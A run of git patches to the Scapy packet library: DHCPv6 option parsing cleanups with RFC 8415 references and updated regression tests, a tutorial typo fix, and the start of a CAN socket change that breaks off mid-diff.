Subject: [PATCH 0214/1632] DHCP6: cleanups & fix some TODOs --- scapy/layers/dhcp6.py | 230 +++++++++++++++++++++++------------------- test/regression.uts | 32 +++--- 2 files changed, 141 insertions(+), 121 deletions(-) diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 2690e9299c3..0b05949f780 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -7,7 +7,7 @@ # Arnaud Ebalard """ -DHCPv6: Dynamic Host Configuration Protocol for IPv6. [RFC 3315] +DHCPv6: Dynamic Host Configuration Protocol for IPv6. [RFC 3315,8415] """ from __future__ import print_function @@ -19,7 +19,7 @@ from scapy.arch import get_if_raw_hwaddr, in6_getifaddr from scapy.config import conf from scapy.data import EPOCH, ETHER_ANY -from scapy.compat import raw, orb, chb +from scapy.compat import raw, orb from scapy.error import warning from scapy.fields import BitField, ByteEnumField, ByteField, FieldLenField, \ FlagsField, IntEnumField, IntField, MACField, PacketField, \ @@ -27,6 +27,7 @@ StrLenField, UTCTimeField, X3BytesField, XIntField, XShortEnumField, \ PacketLenField, UUIDField, FieldListField from scapy.data import IANA_ENTERPRISE_NUMBERS +from scapy.layers.dns import DNSStrField from scapy.layers.inet import UDP from scapy.layers.inet6 import DomainNameListField, IP6Field, IP6ListField, \ IPv6 @@ -184,7 +185,7 @@ def _dhcp6_dispatcher(x, *args, **kargs): } -# sect 5.3 RFC 3315 : DHCP6 Messages types +# sect 7.3 RFC 8415 : DHCP6 Messages types dhcp6types = {1: "SOLICIT", 2: "ADVERTISE", 3: "REQUEST", @@ -300,28 +301,38 @@ class DUID_UUID(Packet): # RFC 6355 class _DHCP6OptGuessPayload(Packet): - @classmethod + @staticmethod def _just_guess_payload_class(cls, payload): # try to guess what option is in the payload - cls = conf.raw_layer - if len(payload) > 2: - opt = struct.unpack("!H", payload[:2])[0] - cls = get_cls(dhcp6opts_by_code.get(opt, "DHCP6OptUnknown"), - DHCP6OptUnknown) - return cls + if len(payload) <= 2: + return conf.raw_layer + opt = struct.unpack("!H", payload[:2])[0] + clsname = dhcp6opts_by_code.get(opt, None) + if clsname is None: + return cls + return get_cls(clsname, cls) def guess_payload_class(self, payload): # this method is used in case of all derived classes # from _DHCP6OptGuessPayload in this file - cls = _DHCP6OptGuessPayload._just_guess_payload_class(payload) - return cls - + return _DHCP6OptGuessPayload._just_guess_payload_class( + DHCP6OptUnknown, + payload + ) + + +class _DHCP6OptGuessPayloadElt(_DHCP6OptGuessPayload): + """ + Same than _DHCP6OptGuessPayload but made for lists + in case of list of different suboptions + e.g. in ianaopts in DHCP6OptIA_NA + """ @classmethod def dispatch_hook(cls, payload=None, *args, **kargs): - # this classmethod is used in case of list of different suboptions - # e.g. in ianaopts in DHCP6OptIA_NA - cls_ = cls._just_guess_payload_class(payload) - return cls_ + return cls._just_guess_payload_class(conf.raw_layer, payload) + + def extract_padding(self, s): + return b"", s class DHCP6OptUnknown(_DHCP6OptGuessPayload): # A generic DHCPv6 Option @@ -354,7 +365,7 @@ def getfield(self, pkt, s): return s[tmp_len:], self.m2i(pkt, s[:tmp_len]) -class DHCP6OptClientId(_DHCP6OptGuessPayload): # RFC sect 22.2 +class DHCP6OptClientId(_DHCP6OptGuessPayload): # RFC 8415 sect 21.2 name = "DHCP6 Client Identifier Option" fields_desc = [ShortEnumField("optcode", 1, dhcp6opts), FieldLenField("optlen", None, length_of="duid", fmt="!H"), @@ -362,31 +373,34 @@ class DHCP6OptClientId(_DHCP6OptGuessPayload): # RFC sect 22.2 length_from=lambda pkt: pkt.optlen)] -class DHCP6OptServerId(DHCP6OptClientId): # RFC sect 22.3 +class DHCP6OptServerId(DHCP6OptClientId): # RFC 8415 sect 21.3 name = "DHCP6 Server Identifier Option" optcode = 2 # Should be encapsulated in the option field of IA_NA or IA_TA options # Can only appear at that location. -# TODO : last field IAaddr-options is not defined in the reference document -class DHCP6OptIAAddress(_DHCP6OptGuessPayload): # RFC sect 22.6 +class DHCP6OptIAAddress(_DHCP6OptGuessPayload): # RFC 8415 sect 21.6 name = "DHCP6 IA Address Option (IA_TA or IA_NA suboption)" fields_desc = [ShortEnumField("optcode", 5, dhcp6opts), FieldLenField("optlen", None, length_of="iaaddropts", fmt="!H", adjust=lambda pkt, x: x + 24), IP6Field("addr", "::"), - IntField("preflft", 0), - IntField("validlft", 0), - StrLenField("iaaddropts", "", - length_from=lambda pkt: pkt.optlen - 24)] + IntEnumField("preflft", 0, {0xffffffff: "infinity"}), + IntEnumField("validlft", 0, {0xffffffff: "infinity"}), + # last field IAaddr-options is not defined in the + # reference document. We copy what wireshark does: read + # more dhcp6 options and excpect failures + PacketListField("iaaddropts", [], + _DHCP6OptGuessPayloadElt, + length_from=lambda pkt: pkt.optlen - 24)] def guess_payload_class(self, payload): return conf.padding_layer -class DHCP6OptIA_NA(_DHCP6OptGuessPayload): # RFC sect 22.4 +class DHCP6OptIA_NA(_DHCP6OptGuessPayload): # RFC 8415 sect 21.4 name = "DHCP6 Identity Association for Non-temporary Addresses Option" fields_desc = [ShortEnumField("optcode", 3, dhcp6opts), FieldLenField("optlen", None, length_of="ianaopts", @@ -394,17 +408,17 @@ class DHCP6OptIA_NA(_DHCP6OptGuessPayload): # RFC sect 22.4 XIntField("iaid", None), IntField("T1", None), IntField("T2", None), - PacketListField("ianaopts", [], _DHCP6OptGuessPayload, + PacketListField("ianaopts", [], _DHCP6OptGuessPayloadElt, length_from=lambda pkt: pkt.optlen - 12)] -class DHCP6OptIA_TA(_DHCP6OptGuessPayload): # RFC sect 22.5 +class DHCP6OptIA_TA(_DHCP6OptGuessPayload): # RFC 8415 sect 21.5 name = "DHCP6 Identity Association for Temporary Addresses Option" fields_desc = [ShortEnumField("optcode", 4, dhcp6opts), FieldLenField("optlen", None, length_of="iataopts", fmt="!H", adjust=lambda pkt, x: x + 4), XIntField("iaid", None), - PacketListField("iataopts", [], _DHCP6OptGuessPayload, + PacketListField("iataopts", [], _DHCP6OptGuessPayloadElt, length_from=lambda pkt: pkt.optlen - 4)] @@ -450,7 +464,7 @@ def i2m(self, pkt, x): # Confirm or Information-request -class DHCP6OptOptReq(_DHCP6OptGuessPayload): # RFC sect 22.7 +class DHCP6OptOptReq(_DHCP6OptGuessPayload): # RFC 8415 sect 21.7 name = "DHCP6 Option Request Option" fields_desc = [ShortEnumField("optcode", 6, dhcp6opts), FieldLenField("optlen", None, length_of="reqopts", fmt="!H"), # noqa: E501 @@ -462,7 +476,7 @@ class DHCP6OptOptReq(_DHCP6OptGuessPayload): # RFC sect 22.7 # emise par un serveur pour affecter le choix fait par le client. Dans # les messages Advertise, a priori -class DHCP6OptPref(_DHCP6OptGuessPayload): # RFC sect 22.8 +class DHCP6OptPref(_DHCP6OptGuessPayload): # RFC 8415 sect 21.8 name = "DHCP6 Preference Option" fields_desc = [ShortEnumField("optcode", 7, dhcp6opts), ShortField("optlen", 1), @@ -478,7 +492,7 @@ def i2repr(self, pkt, x): return "%.2f sec" % (self.i2h(pkt, x) / 100.) -class DHCP6OptElapsedTime(_DHCP6OptGuessPayload): # RFC sect 22.9 +class DHCP6OptElapsedTime(_DHCP6OptGuessPayload): # RFC 8415 sect 21.9 name = "DHCP6 Elapsed Time Option" fields_desc = [ShortEnumField("optcode", 8, dhcp6opts), ShortField("optlen", 2), @@ -519,17 +533,31 @@ class DHCP6OptElapsedTime(_DHCP6OptGuessPayload): # RFC sect 22.9 # # Value Data as defined by field. - -# TODO : Decoding only at the moment -class DHCP6OptAuth(_DHCP6OptGuessPayload): # RFC sect 22.11 +# https://www.iana.org/assignments/auth-namespaces +_dhcp6_auth_proto = { + 0: "configuration token", + 1: "delayed authentication", + 2: "delayed authentication (obsolete)", + 3: "reconfigure key", +} +_dhcp6_auth_alg = { + 0: "configuration token", + 1: "HMAC-MD5", +} +_dhcp6_auth_rdm = { + 0: "use of a monotonically increasing value" +} + + +class DHCP6OptAuth(_DHCP6OptGuessPayload): # RFC 8415 sect 21.11 name = "DHCP6 Option - Authentication" fields_desc = [ShortEnumField("optcode", 11, dhcp6opts), FieldLenField("optlen", None, length_of="authinfo", - adjust=lambda pkt, x: x + 11), - ByteField("proto", 3), # TODO : XXX - ByteField("alg", 1), # TODO : XXX - ByteField("rdm", 0), # TODO : XXX - StrFixedLenField("replay", "A" * 8, 8), # TODO: XXX + fmt="!H", adjust=lambda pkt, x: x + 11), + ByteEnumField("proto", 3, _dhcp6_auth_proto), + ByteEnumField("alg", 1, _dhcp6_auth_alg), + ByteEnumField("rdm", 0, _dhcp6_auth_rdm), + StrFixedLenField("replay", b"\x00" * 8, 8), StrLenField("authinfo", "", length_from=lambda pkt: pkt.optlen - 11)] @@ -546,7 +574,7 @@ def i2m(self, pkt, x): return inet_pton(socket.AF_INET6, self.i2h(pkt, x)) -class DHCP6OptServerUnicast(_DHCP6OptGuessPayload): # RFC sect 22.12 +class DHCP6OptServerUnicast(_DHCP6OptGuessPayload): # RFC 8415 sect 21.12 name = "DHCP6 Server Unicast Option" fields_desc = [ShortEnumField("optcode", 12, dhcp6opts), ShortField("optlen", 16), @@ -555,7 +583,7 @@ class DHCP6OptServerUnicast(_DHCP6OptGuessPayload): # RFC sect 22.12 # DHCPv6 Status Code Option # -dhcp6statuscodes = {0: "Success", # sect 24.4 +dhcp6statuscodes = {0: "Success", # RFC 8415 sect 21.13 1: "UnspecFail", 2: "NoAddrsAvail", 3: "NoBinding", @@ -564,7 +592,7 @@ class DHCP6OptServerUnicast(_DHCP6OptGuessPayload): # RFC sect 22.12 6: "NoPrefixAvail"} # From RFC3633 -class DHCP6OptStatusCode(_DHCP6OptGuessPayload): # RFC sect 22.13 +class DHCP6OptStatusCode(_DHCP6OptGuessPayload): # RFC 8415 sect 21.13 name = "DHCP6 Status Code Option" fields_desc = [ShortEnumField("optcode", 13, dhcp6opts), FieldLenField("optlen", None, length_of="statusmsg", @@ -576,7 +604,7 @@ class DHCP6OptStatusCode(_DHCP6OptGuessPayload): # RFC sect 22.13 # DHCPv6 Rapid Commit Option # -class DHCP6OptRapidCommit(_DHCP6OptGuessPayload): # RFC sect 22.14 +class DHCP6OptRapidCommit(_DHCP6OptGuessPayload): # RFC 8415 sect 21.14 name = "DHCP6 Rapid Commit Option" fields_desc = [ShortEnumField("optcode", 14, dhcp6opts), ShortField("optlen", 0)] @@ -616,7 +644,7 @@ def guess_payload_class(self, payload): return conf.padding_layer -class DHCP6OptUserClass(_DHCP6OptGuessPayload): # RFC sect 22.15 +class DHCP6OptUserClass(_DHCP6OptGuessPayload): # RFC 8415 sect 21.15 name = "DHCP6 User Class Option" fields_desc = [ShortEnumField("optcode", 15, dhcp6opts), FieldLenField("optlen", None, fmt="!H", @@ -635,7 +663,7 @@ class VENDOR_CLASS_DATA(USER_CLASS_DATA): name = "vendor class data" -class DHCP6OptVendorClass(_DHCP6OptGuessPayload): # RFC sect 22.16 +class DHCP6OptVendorClass(_DHCP6OptGuessPayload): # RFC 8415 sect 21.16 name = "DHCP6 Vendor Class Option" fields_desc = [ShortEnumField("optcode", 16, dhcp6opts), FieldLenField("optlen", None, length_of="vcdata", fmt="!H", @@ -661,7 +689,7 @@ def guess_payload_class(self, payload): # The third one that will be used for nothing interesting -class DHCP6OptVendorSpecificInfo(_DHCP6OptGuessPayload): # RFC sect 22.17 +class DHCP6OptVendorSpecificInfo(_DHCP6OptGuessPayload): # RFC 8415 sect 21.17 name = "DHCP6 Vendor-specific Information Option" fields_desc = [ShortEnumField("optcode", 17, dhcp6opts), FieldLenField("optlen", None, length_of="vso", fmt="!H", @@ -677,7 +705,7 @@ class DHCP6OptVendorSpecificInfo(_DHCP6OptGuessPayload): # RFC sect 22.17 # masses critique. -class DHCP6OptIfaceId(_DHCP6OptGuessPayload): # RFC sect 22.18 +class DHCP6OptIfaceId(_DHCP6OptGuessPayload): # RFC 8415 sect 21.18 name = "DHCP6 Interface-Id Option" fields_desc = [ShortEnumField("optcode", 18, dhcp6opts), FieldLenField("optlen", None, fmt="!H", @@ -691,7 +719,7 @@ class DHCP6OptIfaceId(_DHCP6OptGuessPayload): # RFC sect 22.18 # A server includes a Reconfigure Message option in a Reconfigure # message to indicate to the client whether the client responds with a # renew message or an Information-request message. -class DHCP6OptReconfMsg(_DHCP6OptGuessPayload): # RFC sect 22.19 +class DHCP6OptReconfMsg(_DHCP6OptGuessPayload): # RFC 8415 sect 21.19 name = "DHCP6 Reconfigure Message Option" fields_desc = [ShortEnumField("optcode", 19, dhcp6opts), ShortField("optlen", 1), @@ -708,7 +736,7 @@ class DHCP6OptReconfMsg(_DHCP6OptGuessPayload): # RFC sect 22.19 # absence of this option, means unwillingness to accept reconfigure # messages, or instruction not to accept Reconfigure messages, for the # client and server messages, respectively. -class DHCP6OptReconfAccept(_DHCP6OptGuessPayload): # RFC sect 22.20 +class DHCP6OptReconfAccept(_DHCP6OptGuessPayload): # RFC 8415 sect 21.20 name = "DHCP6 Reconfigure Accept Option" fields_desc = [ShortEnumField("optcode", 20, dhcp6opts), ShortField("optlen", 0)] @@ -745,24 +773,25 @@ class DHCP6OptDNSDomains(_DHCP6OptGuessPayload): # RFC3646 DomainNameListField("dnsdomains", [], length_from=lambda pkt: pkt.optlen)] -# TODO: Implement iaprefopts correctly when provided with more -# information about it. - -class DHCP6OptIAPrefix(_DHCP6OptGuessPayload): # RFC3633 - name = "DHCP6 Option - IA_PD Prefix option" +class DHCP6OptIAPrefix(_DHCP6OptGuessPayload): # RFC 8415 sect 21.22 + name = "DHCP6 Option - IA Prefix option" fields_desc = [ShortEnumField("optcode", 26, dhcp6opts), FieldLenField("optlen", None, length_of="iaprefopts", adjust=lambda pkt, x: x + 25), - IntField("preflft", 0), - IntField("validlft", 0), + IntEnumField("preflft", 0, {0xffffffff: "infinity"}), + IntEnumField("validlft", 0, {0xffffffff: "infinity"}), ByteField("plen", 48), # TODO: Challenge that default value + # See RFC 8168 IP6Field("prefix", "2001:db8::"), # At least, global and won't hurt # noqa: E501 - StrLenField("iaprefopts", "", - length_from=lambda pkt: pkt.optlen - 25)] + # We copy what wireshark does: read more dhcp6 options and + # expect failures + PacketListField("iaprefopts", [], + _DHCP6OptGuessPayloadElt, + length_from=lambda pkt: pkt.optlen - 25)] -class DHCP6OptIA_PD(_DHCP6OptGuessPayload): # RFC3633 +class DHCP6OptIA_PD(_DHCP6OptGuessPayload): # RFC 8415 sect 21.21 name = "DHCP6 Option - Identity Association for Prefix Delegation" fields_desc = [ShortEnumField("optcode", 25, dhcp6opts), FieldLenField("optlen", None, length_of="iapdopt", @@ -770,7 +799,7 @@ class DHCP6OptIA_PD(_DHCP6OptGuessPayload): # RFC3633 XIntField("iaid", None), IntField("T1", None), IntField("T2", None), - PacketListField("iapdopt", [], _DHCP6OptGuessPayload, + PacketListField("iapdopt", [], _DHCP6OptGuessPayloadElt, length_from=lambda pkt: pkt.optlen - 12)] @@ -790,42 +819,20 @@ class DHCP6OptNISPServers(_DHCP6OptGuessPayload): # RFC3898 length_from=lambda pkt: pkt.optlen)] -class DomainNameField(StrLenField): - def getfield(self, pkt, s): - tmp_len = self.length_from(pkt) - return s[tmp_len:], self.m2i(pkt, s[:tmp_len]) - - def i2len(self, pkt, x): - return len(self.i2m(pkt, x)) - - def m2i(self, pkt, x): - cur = [] - while x: - tmp_len = orb(x[0]) - cur.append(x[1:1 + tmp_len]) - x = x[tmp_len + 1:] - return b".".join(cur) - - def i2m(self, pkt, x): - if not x: - return b"" - return b"".join(chb(len(z)) + z for z in x.split(b'.')) - - class DHCP6OptNISDomain(_DHCP6OptGuessPayload): # RFC3898 name = "DHCP6 Option - NIS Domain Name" fields_desc = [ShortEnumField("optcode", 29, dhcp6opts), FieldLenField("optlen", None, length_of="nisdomain"), - DomainNameField("nisdomain", "", - length_from=lambda pkt: pkt.optlen)] + DNSStrField("nisdomain", "", + length_from=lambda pkt: pkt.optlen)] class DHCP6OptNISPDomain(_DHCP6OptGuessPayload): # RFC3898 name = "DHCP6 Option - NIS+ Domain Name" fields_desc = [ShortEnumField("optcode", 30, dhcp6opts), FieldLenField("optlen", None, length_of="nispdomain"), - DomainNameField("nispdomain", "", - length_from=lambda pkt: pkt.optlen)] + DNSStrField("nispdomain", "", + length_from=lambda pkt: pkt.optlen)] class DHCP6OptSNTPServers(_DHCP6OptGuessPayload): # RFC4075 @@ -862,15 +869,30 @@ class DHCP6OptBCMCSServers(_DHCP6OptGuessPayload): # RFC4280 IP6ListField("bcmcsservers", [], length_from=lambda pkt: pkt.optlen)] -# TODO : Does Nothing at the moment + +_dhcp6_geoconf_what = { + 0: "DHCP server", + 1: "closest network element", + 2: "client" +} -class DHCP6OptGeoConf(_DHCP6OptGuessPayload): # RFC-ietf-geopriv-dhcp-civil-09.txt # noqa: E501 - name = "" +class DHCP6OptGeoConfElement(Packet): + fields_desc = [ByteField("CAtype", 0), + FieldLenField("CAlength", None, length_of="CAvalue"), + StrLenField("CAvalue", "", + length_from=lambda pkt: pkt.CAlength)] + + +class DHCP6OptGeoConf(_DHCP6OptGuessPayload): # RFC 4776 + name = "DHCP6 Option - Civic Location" fields_desc = [ShortEnumField("optcode", 36, dhcp6opts), - FieldLenField("optlen", None, length_of="optdata"), - StrLenField("optdata", "", - length_from=lambda pkt: pkt.optlen)] + FieldLenField("optlen", None, length_of="ca_elts", + adjust=lambda x: x + 3), + ByteEnumField("what", 2, _dhcp6_geoconf_what), + StrFixedLenField("country_code", "FR", 2), + PacketListField("ca_elts", [], DHCP6OptGeoConfElement, + length_from=lambda pkt: pkt.optlen - 3)] # TODO: see if we encounter opaque values from vendor devices @@ -885,19 +907,16 @@ class DHCP6OptRemoteID(_DHCP6OptGuessPayload): # RFC4649 StrLenField("remoteid", "", length_from=lambda pkt: pkt.optlen - 4)] -# TODO : 'subscriberid' default value should be at least 1 byte long - class DHCP6OptSubscriberID(_DHCP6OptGuessPayload): # RFC4580 name = "DHCP6 Option - Subscriber ID" fields_desc = [ShortEnumField("optcode", 38, dhcp6opts), FieldLenField("optlen", None, length_of="subscriberid"), + # subscriberid default value should be at least 1 byte long + # but we don't really care StrLenField("subscriberid", "", length_from=lambda pkt: pkt.optlen)] -# TODO : "The data in the Domain Name field MUST be encoded -# as described in Section 8 of [5]" - class DHCP6OptClientFQDN(_DHCP6OptGuessPayload): # RFC4704 name = "DHCP6 Option - Client FQDN" @@ -906,8 +925,8 @@ class DHCP6OptClientFQDN(_DHCP6OptGuessPayload): # RFC4704 adjust=lambda pkt, x: x + 1), BitField("res", 0, 5), FlagsField("flags", 0, 3, "SON"), - DomainNameField("fqdn", "", - length_from=lambda pkt: pkt.optlen - 1)] + DNSStrField("fqdn", "", + length_from=lambda pkt: pkt.optlen - 1)] class DHCP6OptPanaAuthAgent(_DHCP6OptGuessPayload): # RFC5192 @@ -991,7 +1010,8 @@ class DHCP6OptRelaySuppliedOpt(_DHCP6OptGuessPayload): # RFC6422 fields_desc = [ShortEnumField("optcode", 66, dhcp6opts), FieldLenField("optlen", None, length_of="relaysupplied", fmt="!H"), - PacketListField("relaysupplied", [], _DHCP6OptGuessPayload, + PacketListField("relaysupplied", [], + _DHCP6OptGuessPayloadElt, length_from=lambda pkt: pkt.optlen)] @@ -1067,7 +1087,7 @@ def hashret(self): # Relayed message is seen as a payload. -class DHCP6OptRelayMsg(_DHCP6OptGuessPayload): # RFC sect 22.10 +class DHCP6OptRelayMsg(_DHCP6OptGuessPayload): # RFC 8415 sect 21.10 name = "DHCP6 Relay Message Option" fields_desc = [ShortEnumField("optcode", 9, dhcp6opts), FieldLenField("optlen", None, fmt="!H", @@ -1621,7 +1641,7 @@ def is_request(self, p): msg += ", ".join(addrs) + n print(msg) - # See sect 18.1.7 + # See RFC 3315 sect 18.1.7 # Sent by a client to warn us she has determined # one or more addresses assigned to her is already @@ -1810,7 +1830,7 @@ def _include_options(query, answer): pass elif msgtype == 8: # RELEASE - # See section 18.1.6 + # See RFC 3315 section 18.1.6 # Message is sent to the server to indicate that # she will no longer use the addresses that was assigned @@ -1825,7 +1845,7 @@ def _include_options(query, answer): pass elif msgtype == 9: # DECLINE - # See section 18.1.7 + # See RFC 3315 section 18.1.7 pass elif msgtype == 11: # INFO-REQUEST diff --git a/test/regression.uts b/test/regression.uts index 37dd70fb801..9fbb6fc0bdf 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4921,7 +4921,7 @@ raw(DHCP6OptIAAddress()) == b'\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x = DHCP6OptIAAddress - Basic Dissection a = DHCP6OptIAAddress(b'\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.optcode == 5 and a.optlen == 24 and a.addr == "::" and a.preflft == 0 and a. validlft == 0 and a.iaaddropts == b"" +a.optcode == 5 and a.optlen == 24 and a.addr == "::" and a.preflft == 0 and a. validlft == 0 and a.iaaddropts == [] = DHCP6OptIAAddress - Instantiation with specific values raw(DHCP6OptIAAddress(optlen=0x1111, addr="2222:3333::5555", preflft=0x66666666, validlft=0x77777777, iaaddropts="somestring")) == b'\x00\x05\x11\x11""33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00UUffffwwwwsomestring' @@ -4931,7 +4931,7 @@ raw(DHCP6OptIAAddress(addr="2222:3333::5555", preflft=0x66666666, validlft=0x777 = DHCP6OptIAAddress - Dissection with specific values a = DHCP6OptIAAddress(b'\x00\x05\x00"""33\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00UUffffwwwwsomerawing') -a.optcode == 5 and a.optlen == 34 and a.addr == "2222:3333::5555" and a.preflft == 0x66666666 and a. validlft == 0x77777777 and a.iaaddropts == b"somerawing" +a.optcode == 5 and a.optlen == 34 and a.addr == "2222:3333::5555" and a.preflft == 0x66666666 and a. validlft == 0x77777777 and a.iaaddropts[0].load == b"somerawing" ############ @@ -5426,18 +5426,18 @@ a.optcode == 28 and a.optlen == 32 and len(a.nispservers) == 2 and a.nispservers + Test DHCP6 Option - NIS Domain Name = DHCP6OptNISDomain - Basic Instantiation -raw(DHCP6OptNISDomain()) == b'\x00\x1d\x00\x00' +raw(DHCP6OptNISDomain()) == b'\x00\x1d\x00\x01\x00' = DHCP6OptNISDomain - Basic Dissection a = DHCP6OptNISDomain(b'\x00\x1d\x00\x00') -a.optcode == 29 and a.optlen == 0 and a.nisdomain == b"" +a.optcode == 29 and a.optlen == 0 and a.nisdomain == b"." = DHCP6OptNISDomain - Instantiation with one domain name -raw(DHCP6OptNISDomain(nisdomain="toto.example.org")) == b'\x00\x1d\x00\x11\x04toto\x07example\x03org' +raw(DHCP6OptNISDomain(nisdomain="toto.example.org")) == b'\x00\x1d\x00\x12\x04toto\x07example\x03org\x00' = DHCP6OptNISDomain - Dissection with one domain name a = DHCP6OptNISDomain(b'\x00\x1d\x00\x11\x04toto\x07example\x03org\x00') -a.optcode == 29 and a.optlen == 17 and a.nisdomain == b"toto.example.org" +a.optcode == 29 and a.optlen == 17 and a.nisdomain == b"toto.example.org." = DHCP6OptNISDomain - Instantiation with one domain with trailing dot raw(DHCP6OptNISDomain(nisdomain="toto.example.org.")) == b'\x00\x1d\x00\x12\x04toto\x07example\x03org\x00' @@ -5448,18 +5448,18 @@ raw(DHCP6OptNISDomain(nisdomain="toto.example.org.")) == b'\x00\x1d\x00\x12\x04t + Test DHCP6 Option - NIS+ Domain Name = DHCP6OptNISPDomain - Basic Instantiation -raw(DHCP6OptNISPDomain()) == b'\x00\x1e\x00\x00' +raw(DHCP6OptNISPDomain()) == b'\x00\x1e\x00\x01\x00' = DHCP6OptNISPDomain - Basic Dissection a = DHCP6OptNISPDomain(b'\x00\x1e\x00\x00') -a.optcode == 30 and a.optlen == 0 and a.nispdomain == b"" +a.optcode == 30 and a.optlen == 0 and a.nispdomain == b"." = DHCP6OptNISPDomain - Instantiation with one domain name -raw(DHCP6OptNISPDomain(nispdomain="toto.example.org")) == b'\x00\x1e\x00\x11\x04toto\x07example\x03org' +raw(DHCP6OptNISPDomain(nispdomain="toto.example.org")) == b'\x00\x1e\x00\x12\x04toto\x07example\x03org\x00' = DHCP6OptNISPDomain - Dissection with one domain name -a = DHCP6OptNISPDomain(b'\x00\x1e\x00\x11\x04toto\x07example\x03org\x00') -a.optcode == 30 and a.optlen == 17 and a.nispdomain == b"toto.example.org" +a = DHCP6OptNISPDomain(b'\x00\x1e\x00\x12\x04toto\x07example\x03org\x00') +a.optcode == 30 and a.optlen == 18 and a.nispdomain == b"toto.example.org." = DHCP6OptNISPDomain - Instantiation with one domain with trailing dot raw(DHCP6OptNISPDomain(nispdomain="toto.example.org.")) == b'\x00\x1e\x00\x12\x04toto\x07example\x03org\x00' @@ -5599,21 +5599,21 @@ a.optcode == 38 and a.optlen == 6 and a.subscriberid == b"someid" + Test DHCP6 Option - Client FQDN = DHCP6OptClientFQDN - Basic Instantiation -raw(DHCP6OptClientFQDN()) == b"\x00'\x00\x01\x00" +raw(DHCP6OptClientFQDN()) == b"\x00'\x00\x02\x00\x00" = DHCP6OptClientFQDN - Basic Dissection a = DHCP6OptClientFQDN(b"\x00'\x00\x01\x00") -a.optcode == 39 and a.optlen == 1 and a.res == 0 and a.flags == 0 and a.fqdn == b"" +a.optcode == 39 and a.optlen == 1 and a.res == 0 and a.flags == 0 and a.fqdn == b"." = DHCP6OptClientFQDN - Instantiation with various flags combinations -raw(DHCP6OptClientFQDN(flags="S")) == b"\x00'\x00\x01\x01" and raw(DHCP6OptClientFQDN(flags="O")) == b"\x00'\x00\x01\x02" and raw(DHCP6OptClientFQDN(flags="N")) == b"\x00'\x00\x01\x04" and raw(DHCP6OptClientFQDN(flags="SON")) == b"\x00'\x00\x01\x07" and raw(DHCP6OptClientFQDN(flags="ON")) == b"\x00'\x00\x01\x06" +raw(DHCP6OptClientFQDN(flags="S")) == b"\x00'\x00\x02\x01\x00" and raw(DHCP6OptClientFQDN(flags="O")) == b"\x00'\x00\x02\x02\x00" and raw(DHCP6OptClientFQDN(flags="N")) == b"\x00'\x00\x02\x04\x00" and raw(DHCP6OptClientFQDN(flags="SON")) == b"\x00'\x00\x02\x07\x00" and raw(DHCP6OptClientFQDN(flags="ON")) == b"\x00'\x00\x02\x06\x00" = DHCP6OptClientFQDN - Instantiation with one fqdn -raw(DHCP6OptClientFQDN(fqdn="toto.example.org")) == b"\x00'\x00\x12\x00\x04toto\x07example\x03org" +raw(DHCP6OptClientFQDN(fqdn="toto.example.org")) == b"\x00'\x00\x13\x00\x04toto\x07example\x03org\x00" = DHCP6OptClientFQDN - Dissection with one fqdn a = DHCP6OptClientFQDN(b"\x00'\x00\x12\x00\x04toto\x07example\x03org\x00") -a.optcode == 39 and a.optlen == 18 and a.res == 0 and a.flags == 0 and a.fqdn == b"toto.example.org" +a.optcode == 39 and a.optlen == 18 and a.res == 0 and a.flags == 0 and a.fqdn == b"toto.example.org." ############ From ab9f2aa349efed7047fe44ce1f0305b4760d0f4d Mon Sep 17 00:00:00 2001 From: cpsnell Date: Sat, 11 Jul 2020 21:34:29 -0400 Subject: [PATCH 0215/1632] Update Scapy in 15 minutes.ipynb Fix typo... --- doc/notebooks/Scapy in 15 minutes.ipynb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/notebooks/Scapy in 15 minutes.ipynb b/doc/notebooks/Scapy in 15 minutes.ipynb index dd273bcfce1..7cc498d710b 100644 --- a/doc/notebooks/Scapy in 15 minutes.ipynb +++ b/doc/notebooks/Scapy in 15 minutes.ipynb @@ -20,7 +20,7 @@ "source": [ "[Scapy](http://www.secdev.org/projects/scapy) is a powerful Python-based interactive packet manipulation program and library. It can be used to forge or decode packets for a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more.\n", "\n", - "This iPython notebook provides a short tour of the main Scapy features. It assumes that you are familiar with networking terminology. All examples where built using the development version from [https://github.com/secdev/scapy](https://github.com/secdev/scapy), and tested on Linux. They should work as well on OS X, and other BSD.\n", + "This iPython notebook provides a short tour of the main Scapy features. It assumes that you are familiar with networking terminology. All examples were built using the development version from [https://github.com/secdev/scapy](https://github.com/secdev/scapy), and tested on Linux. They should work as well on OS X, and other BSD.\n", "\n", "The current documentation is available on [http://scapy.readthedocs.io/](http://scapy.readthedocs.io/) !" ] From eef05e8f72274c28ae4b1c7cd3cdaa8b2176e43c Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 2 Apr 2020 14:08:02 +0200 Subject: [PATCH 0216/1632] Make NativeCANSockets blocking and minor cleanups --- scapy/contrib/cansocket_native.py | 1 - scapy/contrib/cansocket_python_can.py | 57 ++++++++++++----------- test/contrib/automotive/gm/gmlanutils.uts | 10 ++-- test/contrib/isotp.uts | 3 +- test/contrib/isotpscan.uts | 24 ++++++---- 5 files changed, 56 insertions(+), 39 deletions(-) diff --git a/scapy/contrib/cansocket_native.py b/scapy/contrib/cansocket_native.py index 9be0652ec4c..2344e4d821c 100644 --- a/scapy/contrib/cansocket_native.py +++ b/scapy/contrib/cansocket_native.py @@ -28,7 +28,6 @@ class NativeCANSocket(SuperSocket): desc = "read/write packets at a given CAN interface using PF_CAN sockets" - nonblocking_socket = True def __init__(self, channel=None, receive_own_messages=False, can_filters=None, remove_padding=True, basecls=CAN, **kwargs): diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index b2a8506a8fc..1d7ce7cde63 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -21,7 +21,7 @@ from scapy.config import conf from scapy.supersocket import SuperSocket from scapy.layers.can import CAN -from scapy.automaton import SelectableObject +from scapy.error import warning 